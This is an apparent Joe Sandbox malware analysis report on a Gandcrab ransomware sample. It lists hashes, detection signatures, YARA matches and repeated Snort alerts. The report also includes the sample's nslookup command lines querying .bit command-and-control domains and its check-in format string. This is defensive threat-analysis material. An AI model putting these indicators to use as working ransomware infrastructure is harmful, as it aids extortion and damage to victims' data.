Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9gkAKTWOXp.exe

Overview

General Information

Sample Name:9gkAKTWOXp.exe
Analysis ID:694569
MD5:74e135b472b7496b371ce3ba3acfeea8
SHA1:b64fdd870ff28291b8347317a838a5fb210a6056
SHA256:d093322a612760cb00ae6fb4c453851ba26f59f2e6a0920b5871a28bbddf9355
Tags:exe
Infos:

Detection

Gandcrab
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains functionality to determine the online IP of the system
Found Tor onion address
Uses nslookup.exe to query domains
Machine Learning detection for sample
May check the online IP address of the machine
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Queries information about the installed CPU (vendor, model number etc)
Drops PE files
Found evaded block containing many API calls
Contains functionality to enumerate device drivers
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 9gkAKTWOXp.exe (PID: 4664 cmdline: "C:\Users\user\Desktop\9gkAKTWOXp.exe" MD5: 74E135B472B7496B371CE3BA3ACFEEA8)
    • nslookup.exe (PID: 5752 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 484 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5368 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6080 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 3232 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 3460 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 3880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 408 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 996 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5780 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5880 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4948 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6064 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5784 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 2516 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 576 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5964 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4512 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1556 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 2764 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4272 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5236 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5708 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • vkspii.exe (PID: 6028 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe" MD5: 551DA842D854798E9D42602EB420BD96)
  • vkspii.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe" MD5: 551DA842D854798E9D42602EB420BD96)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
9gkAKTWOXp.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
  • 0xf716:$: DECRYPT.txt
  • 0xf784:$: DECRYPT.txt
9gkAKTWOXp.exeJoeSecurity_GandcrabYara detected GandcrabJoe Security
    9gkAKTWOXp.exeGandcrabGandcrab Payloadkevoreilly
    • 0xf70c:$string1: GDCB-DECRYPT.txt
    • 0xf77a:$string1: GDCB-DECRYPT.txt
    • 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
    • 0xf716:$: DECRYPT.txt
    • 0xf784:$: DECRYPT.txt
    C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeJoeSecurity_GandcrabYara detected GandcrabJoe Security
      C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeGandcrabGandcrab Payloadkevoreilly
      • 0xf70c:$string1: GDCB-DECRYPT.txt
      • 0xf77a:$string1: GDCB-DECRYPT.txt
      • 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
        0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
          00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
            00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
              00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
                Click to see the 6 entries
                SourceRuleDescriptionAuthorStrings
                13.0.vkspii.exe.400000.0.unpackSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
                • 0xf716:$: DECRYPT.txt
                • 0xf784:$: DECRYPT.txt
                13.0.vkspii.exe.400000.0.unpackJoeSecurity_GandcrabYara detected GandcrabJoe Security
                  13.0.vkspii.exe.400000.0.unpackGandcrabGandcrab Payloadkevoreilly
                  • 0xf70c:$string1: GDCB-DECRYPT.txt
                  • 0xf77a:$string1: GDCB-DECRYPT.txt
                  • 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
                  1.2.9gkAKTWOXp.exe.400000.0.unpackSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
                  • 0xf716:$: DECRYPT.txt
                  • 0xf784:$: DECRYPT.txt
                  1.2.9gkAKTWOXp.exe.400000.0.unpackJoeSecurity_GandcrabYara detected GandcrabJoe Security
                    Click to see the 13 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.38.8.8.855642532829498 09/01/22-00:01:41.321667
                    SID:2829498
                    Source Port:55642
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860090532829500 09/01/22-00:02:16.489371
                    SID:2829500
                    Source Port:60090
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862436532026737 09/01/22-00:02:57.542714
                    SID:2026737
                    Source Port:62436
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855955532829500 09/01/22-00:03:25.632008
                    SID:2829500
                    Source Port:55955
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853431532829498 09/01/22-00:02:18.409896
                    SID:2829498
                    Source Port:53431
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865513532829500 09/01/22-00:02:19.430995
                    SID:2829500
                    Source Port:65513
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864276532829498 09/01/22-00:03:00.100399
                    SID:2829498
                    Source Port:64276
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851891532026737 09/01/22-00:03:31.975246
                    SID:2026737
                    Source Port:51891
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859765532026737 09/01/22-00:03:34.032990
                    SID:2026737
                    Source Port:59765
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853309532829500 09/01/22-00:01:54.918396
                    SID:2829500
                    Source Port:53309
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854155532829498 09/01/22-00:02:39.711366
                    SID:2829498
                    Source Port:54155
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849169532829500 09/01/22-00:02:32.443414
                    SID:2829500
                    Source Port:49169
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864378532829500 09/01/22-00:03:19.972139
                    SID:2829500
                    Source Port:64378
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857391532829500 09/01/22-00:02:53.276938
                    SID:2829500
                    Source Port:57391
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851597532026737 09/01/22-00:03:26.976848
                    SID:2026737
                    Source Port:51597
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853271532829498 09/01/22-00:02:55.260307
                    SID:2829498
                    Source Port:53271
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853471532829500 09/01/22-00:02:00.665796
                    SID:2829500
                    Source Port:53471
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865323532026737 09/01/22-00:01:43.859132
                    SID:2026737
                    Source Port:65323
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860647532829498 09/01/22-00:03:25.300157
                    SID:2829498
                    Source Port:60647
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850230532026737 09/01/22-00:02:54.735839
                    SID:2026737
                    Source Port:50230
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850624532026737 09/01/22-00:03:18.677171
                    SID:2026737
                    Source Port:50624
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853468532829500 09/01/22-00:02:00.604247
                    SID:2829500
                    Source Port:53468
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858122532829498 09/01/22-00:02:27.905128
                    SID:2829498
                    Source Port:58122
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854436532829498 09/01/22-00:03:36.045306
                    SID:2829498
                    Source Port:54436
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.862426532026737 09/01/22-00:03:13.145963
                    SID:2026737
                    Source Port:62426
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856046532829500 09/01/22-00:01:38.500367
                    SID:2829500
                    Source Port:56046
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859378532829500 09/01/22-00:02:48.340518
                    SID:2829500
                    Source Port:59378
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858305532026737 09/01/22-00:02:34.497221
                    SID:2026737
                    Source Port:58305
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861418532829498 09/01/22-00:02:02.984507
                    SID:2829498
                    Source Port:61418
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850095532026737 09/01/22-00:03:38.741458
                    SID:2026737
                    Source Port:50095
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852114532026737 09/01/22-00:03:20.324395
                    SID:2026737
                    Source Port:52114
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865466532829500 09/01/22-00:03:37.373699
                    SID:2829500
                    Source Port:65466
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853042532026737 09/01/22-00:03:06.339869
                    SID:2026737
                    Source Port:53042
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849877532829500 09/01/22-00:02:36.035379
                    SID:2829500
                    Source Port:49877
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864971532829500 09/01/22-00:03:05.617213
                    SID:2829500
                    Source Port:64971
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861186532829498 09/01/22-00:02:52.648140
                    SID:2829498
                    Source Port:61186
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859829532829500 09/01/22-00:02:55.953112
                    SID:2829500
                    Source Port:59829
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849204532026737 09/01/22-00:02:46.678054
                    SID:2026737
                    Source Port:49204
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861364532829498 09/01/22-00:03:28.558638
                    SID:2829498
                    Source Port:61364
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857829532829500 09/01/22-00:03:23.021549
                    SID:2829500
                    Source Port:57829
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.850788532026737 09/01/22-00:02:43.387386
                    SID:2026737
                    Source Port:50788
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851996532026737 09/01/22-00:02:26.312895
                    SID:2026737
                    Source Port:51996
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857706532829500 09/01/22-00:01:42.686131
                    SID:2829500
                    Source Port:57706
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859436532026737 09/01/22-00:01:57.638087
                    SID:2026737
                    Source Port:59436
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859822532026737 09/01/22-00:02:19.952319
                    SID:2026737
                    Source Port:59822
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860587532026737 09/01/22-00:01:27.550732
                    SID:2026737
                    Source Port:60587
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852957532829500 09/01/22-00:01:25.328522
                    SID:2829500
                    Source Port:52957
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.858914532829500 09/01/22-00:03:18.020601
                    SID:2829500
                    Source Port:58914
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853850532026737 09/01/22-00:01:50.247028
                    SID:2026737
                    Source Port:53850
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.856619532026737 09/01/22-00:02:49.126045
                    SID:2026737
                    Source Port:56619
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852112532026737 09/01/22-00:03:20.284135
                    SID:2026737
                    Source Port:52112
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865198532829500 09/01/22-00:02:04.768621
                    SID:2829500
                    Source Port:65198
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853848532829498 09/01/22-00:01:59.462827
                    SID:2829498
                    Source Port:53848
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851893532026737 09/01/22-00:03:32.036713
                    SID:2026737
                    Source Port:51893
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854433532829498 09/01/22-00:03:35.979601
                    SID:2829498
                    Source Port:54433
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853310532829500 09/01/22-00:01:54.940366
                    SID:2829500
                    Source Port:53310
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859438532026737 09/01/22-00:01:57.681285
                    SID:2026737
                    Source Port:59438
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861421532829498 09/01/22-00:02:03.043258
                    SID:2829498
                    Source Port:61421
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.852458532026737 09/01/22-00:03:02.844406
                    SID:2026737
                    Source Port:52458
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855652532829498 09/01/22-00:03:19.259211
                    SID:2829498
                    Source Port:55652
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.861130532829498 09/01/22-00:03:15.942186
                    SID:2829498
                    Source Port:61130
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860421532829498 09/01/22-00:03:32.382333
                    SID:2829498
                    Source Port:60421
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864973532829500 09/01/22-00:03:05.661525
                    SID:2829500
                    Source Port:64973
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863567532026737 09/01/22-00:02:17.089606
                    SID:2026737
                    Source Port:63567
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865463532829500 09/01/22-00:03:37.309587
                    SID:2829500
                    Source Port:65463
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865389532026737 09/01/22-00:02:38.719558
                    SID:2026737
                    Source Port:65389
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853040532026737 09/01/22-00:03:06.300781
                    SID:2026737
                    Source Port:53040
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857827532829500 09/01/22-00:03:22.978908
                    SID:2829500
                    Source Port:57827
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853039532026737 09/01/22-00:03:06.280270
                    SID:2026737
                    Source Port:53039
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859585532026737 09/01/22-00:02:11.746820
                    SID:2026737
                    Source Port:59585
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.857708532829500 09/01/22-00:01:42.729663
                    SID:2829500
                    Source Port:57708
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851142532829498 09/01/22-00:01:24.090037
                    SID:2829498
                    Source Port:51142
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853433532829498 09/01/22-00:02:18.458138
                    SID:2829498
                    Source Port:53433
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.860093532829500 09/01/22-00:02:16.558554
                    SID:2829500
                    Source Port:60093
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.849206532026737 09/01/22-00:02:46.717208
                    SID:2026737
                    Source Port:49206
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851143532829498 09/01/22-00:01:24.124615
                    SID:2829498
                    Source Port:51143
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854158532829498 09/01/22-00:02:39.772185
                    SID:2829498
                    Source Port:54158
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859376532829500 09/01/22-00:02:48.263272
                    SID:2829500
                    Source Port:59376
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864825532829500 09/01/22-00:02:24.749273
                    SID:2829500
                    Source Port:64825
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.864273532829498 09/01/22-00:03:00.036817
                    SID:2829498
                    Source Port:64273
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.851894532026737 09/01/22-00:03:32.055555
                    SID:2026737
                    Source Port:51894
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.854434532829498 09/01/22-00:03:36.001169
                    SID:2829498
                    Source Port:54434
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.859768532026737 09/01/22-00:03:34.095324
                    SID:2026737
                    Source Port:59768
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853054532829498 09/01/22-00:02:15.078816
                    SID:2829498
                    Source Port:53054
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.863448532829498 09/01/22-00:02:35.455212
                    SID:2829498
                    Source Port:63448
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865111532829500 09/01/22-00:01:46.954181
                    SID:2829500
                    Source Port:65111
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.853627532026737 09/01/22-00:02:01.832804
                    SID:2026737
                    Source Port:53627
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865200532829500 09/01/22-00:02:04.820486
                    SID:2829500
                    Source Port:65200
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.855461532829498 09/01/22-00:03:07.325312
                    SID:2829498
                    Source Port:55461
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865390532026737 09/01/22-00:02:38.738598
                    SID:2026737
                    Source Port:65390
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.38.8.8.865516532829500 09/01/22-00:02:19.492210
                    SID:2829500
                    Source Port:65516
                    Destination Port:53
                    Protocol:UDP
